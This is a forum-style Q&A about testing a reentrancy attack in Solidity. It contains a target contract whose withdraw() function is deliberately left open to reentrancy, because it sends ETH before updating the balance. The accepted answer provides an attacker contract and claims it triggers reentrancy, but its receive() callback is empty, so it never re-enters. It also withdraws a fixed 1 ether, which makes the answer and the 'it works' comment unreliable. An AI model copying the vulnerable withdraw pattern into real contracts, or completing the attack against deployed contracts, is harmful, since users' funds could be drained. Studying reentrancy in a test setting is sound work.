# How to call a function from a separate contract

Tags: solidity, contract-development, contract-deployment, contract-debugging

I have a already deployed contract and it has a `withdraw()` function.
And i want to create another contract that first send some ETH to the target contract and then call the `withdraw()` to withdraw their ETH.In fact i want to test the **"reentrancy"** attackk!

Target contract:

```
contract test {

    mapping(address => uint) balance;

    function withdraw(uint _amount) public {
        require(balance[msg.sender] >= _amount, "You dont have enough money!");

        (bool success, ) = msg.sender.call{value:_amount}("");
        require(success);

        balance[msg.sender] -= _amount;
    }


    receive() external payable {
        balance[msg.sender] += msg.value;
    }
}
```

Attacker contract will be something like:

```
contract main {

    address immutable owner;

    constructor() {
        owner = msg.sender;
    }

    function sendFundsToTarget(uint _a, address payable _add) public {
        (bool success, ) = _add.call{value:_a}("");
        require(success);
    }

    function deposit() public payable {
        require(msg.sender == owner);
    }


    receive() external payable {
        // something that can recall the withdraw() 
    }
}
```

Answer (score 1, accepted):

To create an attacker contract for a reentrancy attack, you need to send some ETH to the target contract and then call its `withdraw()` function from within the `receive()` function of your attacker contract. Here's an example of how your attacker contract could look:

```
pragma solidity ^0.8.0;

contract Attack {
    address immutable owner;
    address target; // Address of the target contract

    constructor(address _target) {
        owner = msg.sender;
        target = _target;
    }

    function sendFundsToTarget(uint _amount) public {
        // Send ETH to the target contract
        (bool success, ) = target.call{value: _amount}("");
        require(success, "Sending ETH to target failed");
    }

    function startAttack() public {
        // Call the target contract's withdraw() function to trigger the reentrancy attack
        (bool success, ) = target.call(abi.encodeWithSignature("withdraw(uint256)", 1 ether));
        require(success, "Call to withdraw() failed");
    }

    receive() external payable {
        // This is the callback function that will be called when the target contract sends ETH back
        // You can choose to re-enter the target contract here if desired
        // Be cautious with reentrancy to avoid infinite loops or unintended behavior
    }
}
```

Make sure you deploy the attacker contract with the address of the target contract as a parameter to the constructor. Then, you can call `sendFundsToTarget()` to send some ETH to the target and `startAttack()` to initiate the reentrancy attack.

Comment: Thank you it works.